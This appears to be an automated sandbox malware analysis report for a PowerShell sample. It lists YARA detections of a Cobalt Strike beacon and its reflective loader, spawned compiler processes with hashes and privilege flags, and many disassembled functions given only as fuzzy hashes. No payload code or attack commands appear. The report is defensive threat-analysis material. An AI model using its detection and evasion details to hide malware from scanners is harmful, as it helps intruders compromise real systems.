                                                                        • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                        • Rule: HKTL_CobaltStrike_SleepMask_Jul22, Description: Detects static bytes in Cobalt Strike 4.5 sleep mask function that are not obfuscated, Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, Author: CodeX
                                                                        • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                        • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        Reputation:high

                                                                        General

                                                                        Target ID:1
                                                                        Start time:01:14:17
                                                                        Start date:21/01/2023
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7fcd70000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Target ID:2
                                                                        Start time:01:14:21
                                                                        Start date:21/01/2023
                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\h4qpy1nu\h4qpy1nu.cmdline
                                                                        Imagebase:0x7ff7bf860000
                                                                        File size:2739304 bytes
                                                                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Reputation:moderate

                                                                        General

                                                                        Target ID:3
                                                                        Start time:01:14:21
                                                                        Start date:21/01/2023
                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9A43.tmp" "c:\Users\user\AppData\Local\Temp\h4qpy1nu\CSCE97AB74AE4304D2FB93613F88A1756.TMP"
                                                                        Imagebase:0x7ff766b50000
                                                                        File size:47280 bytes
                                                                        MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate

                                                                        Disassembly

                                                                        Reset < >

                                                                          Executed Functions

                                                                          Function 00007FF9A5E1A206 Relevance: 1.3, Instructions: 1314COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.363253553.00007FF9A5E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5E10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff9a5e10000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c3d5ff2b9a339e12971d35e9993bad5110923a08ae8b2fc9d213aeaa739fb4be
                                                                          • Instruction ID: 714c1d3aa2e62e73136e16074c238da40936cd2d41fe04e7496fa262fd653e62
                                                                          • Opcode Fuzzy Hash: c3d5ff2b9a339e12971d35e9993bad5110923a08ae8b2fc9d213aeaa739fb4be
                                                                          • Instruction Fuzzy Hash: 11924631A0DB895FEB96DB2884556B57BE2FF66710F1800BED08DC7193DA68BC46C381
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00007FF9A5D4C8E0 Relevance: 1.3, Instructions: 1297COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.362962874.00007FF9A5D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff9a5d40000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4c9fb27e04d2a342da09a866a4fa52b49c813cd7eaaa8eeaa2391fad67ed1ac2
                                                                          • Instruction ID: c05b5ba416ab697f68c87d2c1785e666c26ad7e7604dbfe2ac4a817fa14656fe
                                                                          • Opcode Fuzzy Hash: 4c9fb27e04d2a342da09a866a4fa52b49c813cd7eaaa8eeaa2391fad67ed1ac2
                                                                          • Instruction Fuzzy Hash: 3C22EF31A0CB8A8FEB44DF68D495AE97BF1FF5A710F04417AD089D7292CA64BC45C781
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00007FF9A5D43CC5 Relevance: .6, Instructions: 648COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.362962874.00007FF9A5D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff9a5d40000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 33035c2f6032c736041373cd296da596aedc1f1c2de07f9f083be11149e67321
                                                                          • Instruction ID: 6cb65ebf2f02528c738fa70d4391703575324e27f2d54810d14032a5db7f1b70
                                                                          • Opcode Fuzzy Hash: 33035c2f6032c736041373cd296da596aedc1f1c2de07f9f083be11149e67321
                                                                          • Instruction Fuzzy Hash: FC12F530A18A498FDB88DF1CD485AA97BF1FF5A710F14417AD48DC7296CA65FC86CB80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00007FF9A5D45288 Relevance: .6, Instructions: 642COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.362962874.00007FF9A5D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff9a5d40000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2be5d6dcffd81e33c539b05b2ac1ecc8dd202ce889f0d65c51f7ea019f5e1894
                                                                          • Instruction ID: 6e8936145a7a6b95022427fbd57c946de2648e258726a75c2f2c52de99f3695a
                                                                          • Opcode Fuzzy Hash: 2be5d6dcffd81e33c539b05b2ac1ecc8dd202ce889f0d65c51f7ea019f5e1894
                                                                          • Instruction Fuzzy Hash: 66120431A08A498FDB88DF1CD495AA97BF1FFA9710F14417AD44DC7296CA64FC82CB81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00007FF9A5D46739 Relevance: .6, Instructions: 633COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.362962874.00007FF9A5D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff9a5d40000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b895596a34be20fc2cd3b2151184a4e213b9fc0d47a884d63a386ef30308587e
                                                                          • Instruction ID: e7f6ab9ce083fa27bba141ea9202e82baa1d4006dc1f5c30ef81f3aad8a61c14
                                                                          • Opcode Fuzzy Hash: b895596a34be20fc2cd3b2151184a4e213b9fc0d47a884d63a386ef30308587e
                                                                          • Instruction Fuzzy Hash: 9B22AE30A18A498FDB88DF58C495AA9BBF2FF99700F14417ED44AD7286CA74FC45CB81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00007FF9A5E1A7D1 Relevance: .5, Instructions: 466COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.363253553.00007FF9A5E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5E10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff9a5e10000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f0b487ace94beb1a07671a2b73a19318b0d0149f1a10f04c07b45d6c56065339
                                                                          • Instruction ID: 6997c7da5932d9c9affd0b7a2b58c9a0067aa0013f6b711df7ba3413336b7b8f
                                                                          • Opcode Fuzzy Hash: f0b487ace94beb1a07671a2b73a19318b0d0149f1a10f04c07b45d6c56065339
                                                                          • Instruction Fuzzy Hash: D9E10571A0DB895FEB99DB1884546787BE2FFA6700F2440BED08DC7282DE65BC46C781
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00007FF9A5E1908A Relevance: .4, Instructions: 447COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.363253553.00007FF9A5E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5E10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff9a5e10000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 783481e162ec7161cd5d37c80661e0a1f6e452b0d92750bb1aba32722ba465a6
                                                                          • Instruction ID: 31c92530c480324b8e0a7a68cfdf605e08e45fbefd9d7837914f9040cb705d99
                                                                          • Opcode Fuzzy Hash: 783481e162ec7161cd5d37c80661e0a1f6e452b0d92750bb1aba32722ba465a6
                                                                          • Instruction Fuzzy Hash: C9D10071A0E7C91FE357D73898146A63FA1EF93710F1901EBE488CB1A3DA68AC45C352
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00007FF9A5D432A3 Relevance: .4, Instructions: 436COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.362962874.00007FF9A5D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff9a5d40000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 04252333a69619011bd7fb93cca30520a1edf4a6847cf34409650aa9861a1e1c
                                                                          • Instruction ID: 63591b7f60d6844ff9d530be5f4c864e2e0b21f069aae60b51162024010a9d42
                                                                          • Opcode Fuzzy Hash: 04252333a69619011bd7fb93cca30520a1edf4a6847cf34409650aa9861a1e1c
                                                                          • Instruction Fuzzy Hash: 21E1EE30A18A4E8FDB84DF6CD495AA97BF1FF69700F14416AD44DC7286CA64FC85CB80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00007FF9A5D468C4 Relevance: .4, Instructions: 411COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.362962874.00007FF9A5D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff9a5d40000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 366fbc4d2d7ffd06776d5ce99c8a98c9388e47708f26b7932540a74ff56109fd
                                                                          • Instruction ID: 8c8050c5daaaf7cde7877ed8154990db9f8139bc5e3a74381c9f386a8927c04c
                                                                          • Opcode Fuzzy Hash: 366fbc4d2d7ffd06776d5ce99c8a98c9388e47708f26b7932540a74ff56109fd
                                                                          • Instruction Fuzzy Hash: C2D1A030A18A498FDF88DF48C495AA9BBF1FF99710F14416AD44AD7285CB74FC86CB81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00007FF9A5E178B0 Relevance: .3, Instructions: 279COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.363253553.00007FF9A5E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5E10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff9a5e10000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4a6191f06eb9233e3575603f9674e712910d60c3d4d9d50aaaefdd0c75d71a44
                                                                          • Instruction ID: c1fa63de0f9fd1aad9c8ecec268b14dba52261e4411c27b9db284a31486572f8
                                                                          • Opcode Fuzzy Hash: 4a6191f06eb9233e3575603f9674e712910d60c3d4d9d50aaaefdd0c75d71a44
                                                                          • Instruction Fuzzy Hash: D4814832B0DA8D5FE792DB28A8446B67BA1FF66B10F1501BAE44DC7193DA58B805C341
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00007FF9A5E18848 Relevance: .2, Instructions: 183COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.363253553.00007FF9A5E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5E10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff9a5e10000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ed5b0f41f1365fcf3bf56d22590fc945a1d52043c2e2133bd5bd9afd53df69de
                                                                          • Instruction ID: d528f81d9364f9baf3b96b3f205d5e20b75d88300bbcee75456ce373c8eda236
                                                                          • Opcode Fuzzy Hash: ed5b0f41f1365fcf3bf56d22590fc945a1d52043c2e2133bd5bd9afd53df69de
                                                                          • Instruction Fuzzy Hash: 5A511871A0DB89AFEB99CB288454265BBE1FFA6700F1441BED08DD7283CE34BC018742
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00007FF9A5D40FD9 Relevance: .2, Instructions: 171COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.362962874.00007FF9A5D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff9a5d40000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8a144771256e17a4e3e170644631eb085a90939ca63de2d973483c112406911e
                                                                          • Instruction ID: 606ef5bd1fd27491376c6f490c4c9f2e9c70a4dc4165cc5d606466b8419bb181
                                                                          • Opcode Fuzzy Hash: 8a144771256e17a4e3e170644631eb085a90939ca63de2d973483c112406911e
                                                                          • Instruction Fuzzy Hash: 4B510B31A0DA894FD344DB28D455BA5BBF1FF96310F0486BBD09DC7192CE68AD89C781
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00007FF9A5D4D15E Relevance: .1, Instructions: 123COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.362962874.00007FF9A5D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff9a5d40000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ba166b0d908da5b58f4167b1be290adc65158afc8e2c5158bad5dc458d29f368
                                                                          • Instruction ID: 108e541ab998e28a0c1aef9f7f2452b3ec71fa28b30722825dcf3d401de52acf
                                                                          • Opcode Fuzzy Hash: ba166b0d908da5b58f4167b1be290adc65158afc8e2c5158bad5dc458d29f368
                                                                          • Instruction Fuzzy Hash: 1C41F930A1CA488FDF88EF58D491AA97BE1FFA9700F14416AE44DD3295CB75EC81CB81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00007FF9A5E13D2C Relevance: .1, Instructions: 61COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.363253553.00007FF9A5E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5E10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff9a5e10000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c441db31839cb28b2a6d63c6eced2b1cbc0e30e92791db5152dca238a3fc20e7
                                                                          • Instruction ID: e542a9f17112d1ca3eff0ddbca3ee3b209ca788fcb4e3fc1a8d02efdde66ee3b
                                                                          • Opcode Fuzzy Hash: c441db31839cb28b2a6d63c6eced2b1cbc0e30e92791db5152dca238a3fc20e7
                                                                          • Instruction Fuzzy Hash: CB113AB2B0D7894FE746D76860906F877B1FF2A350B1441BEC48DC7183CA15B8018351
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00007FF9A5E17811 Relevance: .1, Instructions: 60COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.363253553.00007FF9A5E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5E10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff9a5e10000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0b88a716c0a31f61aec2c068ed81b0364d33fba242a6357569b2e0d8c15c2be5
                                                                          • Instruction ID: 2089773d817714bb785e515645d418492b636d66d181a607a3e3da3037eb4363
                                                                          • Opcode Fuzzy Hash: 0b88a716c0a31f61aec2c068ed81b0364d33fba242a6357569b2e0d8c15c2be5
                                                                          • Instruction Fuzzy Hash: BD012430A1D3894FDB6A8B7490170A97FE0EF0222071541FFD08AC76E3DAD864428B02
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00007FF9A5D42B55 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.362962874.00007FF9A5D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff9a5d40000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4d93adf4f0ae26c4836b4afa6c1f98a9c0eab930e8ee4f8de384efc3954c6fc5
                                                                          • Instruction ID: 53c2e59ce65232316c2e845967ff1e8df143f9edddb7839742f5ae494e349fa7
                                                                          • Opcode Fuzzy Hash: 4d93adf4f0ae26c4836b4afa6c1f98a9c0eab930e8ee4f8de384efc3954c6fc5
                                                                          • Instruction Fuzzy Hash: D301677115CB0C4FD744EF0CE451AA6B7E0FB95324F10056DE58AC3655DA36E881CB46
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00007FF9A5D42ED8 Relevance: .0, Instructions: 40COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.362962874.00007FF9A5D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff9a5d40000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4c3661c174b678e8ddc09cd3c3e98414191130c8553dd58c47ec20684617e97b
                                                                          • Instruction ID: 479effd944d83d3d1f47ef11a93bccded2a19041ed08b3fcd7af2b72ea62a495
                                                                          • Opcode Fuzzy Hash: 4c3661c174b678e8ddc09cd3c3e98414191130c8553dd58c47ec20684617e97b
                                                                          • Instruction Fuzzy Hash: D5F0303276C6044F974C9A0CF8539B573D1E78A220B40417EE48AC2696E916B8468686
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00007FF9A5D42E94 Relevance: .0, Instructions: 40COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.362962874.00007FF9A5D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff9a5d40000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e769232cfe6b8412c24f5f75de5ee7726cc0871aaa2b928402e1391e0c1975a3
                                                                          • Instruction ID: f28f1f649a9b53190a4f3cafc749a8c0d69344394069090dde151275c49c370e
                                                                          • Opcode Fuzzy Hash: e769232cfe6b8412c24f5f75de5ee7726cc0871aaa2b928402e1391e0c1975a3
                                                                          • Instruction Fuzzy Hash: EAE0303276C6044F970C9A0CF8539B573D1E789224B40416EE48AC2656E816B8438686
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Function 00007FF9A5D40CA8 Relevance: .5, Instructions: 546COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.362962874.00007FF9A5D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff9a5d40000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bc4a53a722784cd19111e0d3dcdec436e68f41c768973a23455c04290ff926b8
                                                                          • Instruction ID: 6e868be691d488fd23146c20c39dee671aed9fe5c14b316cc605ff768ec80be6
                                                                          • Opcode Fuzzy Hash: bc4a53a722784cd19111e0d3dcdec436e68f41c768973a23455c04290ff926b8
                                                                          • Instruction Fuzzy Hash: 57F14931B4DA4A4FE368DBA8E4857B1B7F0EF46710B14857EC4DEC7692DA64BC468380
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%